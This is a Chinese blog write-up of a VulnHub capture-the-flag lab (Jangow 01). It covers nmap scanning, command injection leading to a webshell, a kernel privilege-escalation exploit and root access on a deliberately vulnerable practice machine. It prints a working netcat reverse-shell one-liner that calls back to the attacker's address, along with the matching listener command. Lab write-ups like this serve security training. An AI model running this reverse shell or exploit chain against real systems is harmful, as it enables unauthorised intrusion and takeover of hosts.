VulnHub-Jangow-01-1.0.1打靶记录

已于 2022-08-21 11:34:03 修改
阅读量521 收藏 2
点赞数 3
分类专栏: VulnHub 文章标签: 网络 服务器 linux
于 2022-08-21 11:32:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43534481/article/details/126448869
版权

知识点

  • NMAP参数
    • -sV 获取系统信息
    • -sT TCP扫描可能会留下日志记录
    • -sC 使用默认脚本(在-A模式下不需要)
    • -p1-xxx 扫描端口号 -p- ==>等价于 -p1-65535 不设置端口就扫描默认端口
    • -Pn 绕过禁用ping
    • -A 进攻性扫描也会运行默认脚本)
  • arp-scan arp利用arp地址解析协议探测扫描
    • -I 大写i 用以指定用来扫描的网卡 如果未指定会使用网卡序号最低的一个 也就是eth0但是如果指定 那么指定的网卡必须支持ARP
    • -l 小写L 表示从网络接口的ip和掩码生成列表进行扫描

准备工作

由于下载的ova文件默认是仅主机模式,不方便使用,这里用vm打开后改为,nat模式,当然如果要使用仅主机模式,只要保持,可以和目标通信即可。

由于镜像保护原因,直接下载的可能遇到无法获得ip的情况,可通过一下步骤获取ip

  1. 在下面这个页面按e

在这里插入图片描述

  1. 找到这个位置 将ro更改为 rw single init=/bin/bash,如图所示

  2. 在这里插入图片描述

    在这里插入图片描述

  3. 然后按ctr+x进入命令行页面

  4. 查看网卡名称
    在这里插入图片描述

  5. 进入网络配置面板

    在这里插入图片描述

  6. 在这里插入图片描述

  7. 将该文件的网卡名称改为 ens33 在这里插入图片描述

  8. 重启网卡即可获取ip

  9. 在这里插入图片描述

  10. 然后直接重启虚拟机即可进入测试

  11. 在这里插入图片描述

信息收集

  1. 目标发现

在这里插入图片描述

发现目标,由于其他三个是环境中的所以锁定这个(这里有点脱裤子放*了,因为前面重启服务的时候已经看到了,但是如果这个环境没有问题,是需要这样进行目标发现的。)

  1. 资产扫描

    nmap -sV -Pn -A -p- 192.168.245.141

    这里用-p-是全端口扫描,虽然慢点,但是这样可以保证资产不遗漏,如果靶机改了端口,用常用端口无法扫描到。

  2. 在这里插入图片描述

    这里扫描发现有一个http服务,和ftp服务,ftp需要账号密码,转向http服务

  3. http测试

在这里插入图片描述

  1. 点击site进入网站首页

在这里插入图片描述

  1. 翻看发现这个页面存在命令执行。

在这里插入图片描述

7.在这里插入图片描述 只需要在参数后门加要执行的命令

  1. webshell写入

    在这里插入图片描述

    注意那么美元符前面要加反斜杠,否则在执行的时候,命令行会把他当做一个变量,无法写入到文件

  2. 使用ls命令查看目标已写入成功,用蚁剑连接

  3. 在这里插入图片描述

    这个文件中有数据库信息,本打算利用数据库提权,但是很遗憾无法连接,按理说用webshell连接是本地连接但是连接不上。

  4. 寻找其他的方法,本想将权限返回到msf或者cs上进行下一步自动发测试但是多种方式测试均无法成功上线,可能是防火墙原因也有可能是靶场的linux环境不支持我测试的后门程序。

  5. 这里使用命令 uname -a 可以发现 系统内核版本信息,使用searchsploit进行搜索,结果如下
    在这里插入图片描述

  6. 经测试只有45010.c这个文件可以成功反弹,其他均失败

  7. 将shell反弹到nc,因为需要接收exp执行后返回的回话。
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.245.128 443 >/tmp/f 更换ip即可
    nc -lvnp 443 端口不能换,其他端口没办法反弹。

  8. 在这里插入图片描述

  9. 执行 exp ./exp 如果执行不成功 添加执行权限 chmod +x exp 后再执行

  10. 在这里插入图片描述

38195)]
17. 执行 exp ./exp 如果执行不成功 添加执行权限 chmod +x exp 后再执行
18. [外链图片转存中…(img-C4kFovwJ-1661052138195)]

获得了root权限,使用passwd即可更改密码,可以任意方法维持权限。

苦蛇
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
geronimo-j2ee-management_1.1_spec-1.0.1-API文档-中文版.zip
04-08
赠送原API文档:geronimo-j2ee-management_1.1_spec-1.0.1-javadoc.jar; 赠送源代码:geronimo-j2ee-management_1.1_spec-1.0.1-sources.jar; 包含翻译后的API文档:geronimo-j2ee-management_1.1_spec-1.0.1-...
渗透测试Jangow1.0.1--入门级
G208_522的博客
03-25 5628
渗透测试Jangow101(一) 一、环境搭建 1、靶机:ip:192.168.0.9 靶机下载:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 2、攻击机:ip:192.168.0.11 3、如何搭建 下载后的文件直接右键打开方式,选择virtualbox(介意使用virtualbox) 使用virtualbox打开后会显示靶机ip 二、信息收集 1、nmap扫描开放端口 nmap -sC -sV 192.168.0.9 -sV 扫描目
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 2693
一次打靶记录
VulnHub | Jangow 1.0.1
薛定的餓貓
12-05 3136
VulnHub | Jangow 1.0.1 项目地址 http://www.vulnhub.com/entry/jangow-101,754/ 难度:Easy 测试环境 攻击机:Parrot 192.168.56.104 目标靶机:Ubuntu 192.168.56.118 信息收集 开启目标靶机,登陆界面有其IP地址,不用自己手动扫描。但是还是要用nmap扫一下开启了什么端口。sudo nmap -sS -n -p- 192.168.56.118,然后使用-sV参数查看开放端口的详细信息。 打开网页
靶场实战】Vulnhub - JANGOW: 1.0.1 靶标实战
做自己喜欢的事,并将其发挥到极致!
05-30 999
Vulnhub - JANGOW: 1.0.1 靶标实战
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2573
迟到的文章,就当库存发出来吧~
Vulnhub靶场Jangow靶机环境找不到ip解决方法。
m0_64376783的博客
04-14 677
删除etc得到了/ vim /etc 接着补全 vim /etc/network 回车看见网卡界面。先配置好,因为扫描的时候会扫不到ip 网络模式调节为桥接模式,然后开机,按e键,进入编辑模式输入。pwd 查看目录 cd init.d 进入目录,ls查看,看见networking。小小挫折,自己解决,那当然是不可能的。要进入vim /etc/network/interfaces 修改网卡。尝试关机重启,重启以后一直在加载,说明没有效果,方法行不通。ip a查看 网卡ens33 斜杠打不了,只能一步步进入。
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 995
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
Vulnhub靶场JANGOW: 1.0.1
Nailaoyyds的博客
06-02 651
开局是给IP的 二、web渗透 但是只能查看文件,并不能登录。需要进行下一步操作 翻找敏感文件
jangow-01-1.0.1
qq_46140711的博客
09-22 1131
jangow-01-1.0.1靶机练习
jangow-01-1.0.1靶机复盘
weixin_44681307的博客
07-09 91
为什么要说防火墙,后来才发现这个靶机设置了防火墙,只有允许的端口允许的命令才可以用,其他的都不能用,包括端口也只有443端口被允许通过。因为nc -e不能用,所以就在网上找了个反弹shell的命令,这里要注意的是只有443端口能用,别的端口都不能用。在网址后面随便输入ls命令,发现可以用,经过尝试发现这里可以注入代码,但是有一些命令被禁用了,比如nc。搜了一圈发现有两个php文件挺可疑,就发送到自己电脑上了,实际后面没啥用,ftp也没啥用。测试后发现是可以的,代码不见了,说明被执行了。
Dell-EMC-Fans-Controller-1.0.1
04-09
Dell-EMC-Fans-Controller-1.0.1
jboss-servlet-3.0-api-1.0.1-9.el7.noarch.rpm
01-08
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
apache-doris-spark-connector-2.3_2.11-1.0.1
05-05
Spark Doris Connector(apache-doris-spark-connector-2.3_2.11-1.0.1-incubating-src.tar.gz) Spark Doris Connector Version:1.0.1 Spark Version:2.x Scala Version:2.11 Apache Doris是一个现代MPP分析...
jangow-01靶机全过程(超详细!)
qq_68868384的博客
08-09 189
使用nmap进行全网段大致扫描-sS:半开放扫描,扫描时不完成tcp的连接,这样可以使扫描更加隐蔽且更快-T4:paranoid (0), sneaky (1), polite (2), normal (3),侵略性(4)和疯狂(5)。前两个是为了逃避IDS(入侵检测系统)。礼貌模式减慢扫描速度以使用更少的带宽目标机器资源。正常模式是默认的,所以-T3什么也不做。侵略性模式将扫描速度提高到假设您在一个相当快速和可靠的网络上。
vulnhub靶场Jangow: 1.0.1
nightwindnw的博客
01-09 262
闲得无聊,好久没做题了。去vulnhub发现21年好多没做过。找了个Jangow: 1.0.1做做,以此记录……
Vulnhub靶机:jangow-01-1.0.1
最新发布
qq_48904485的博客
01-03 422
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:jangow01(10.0.2.4)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值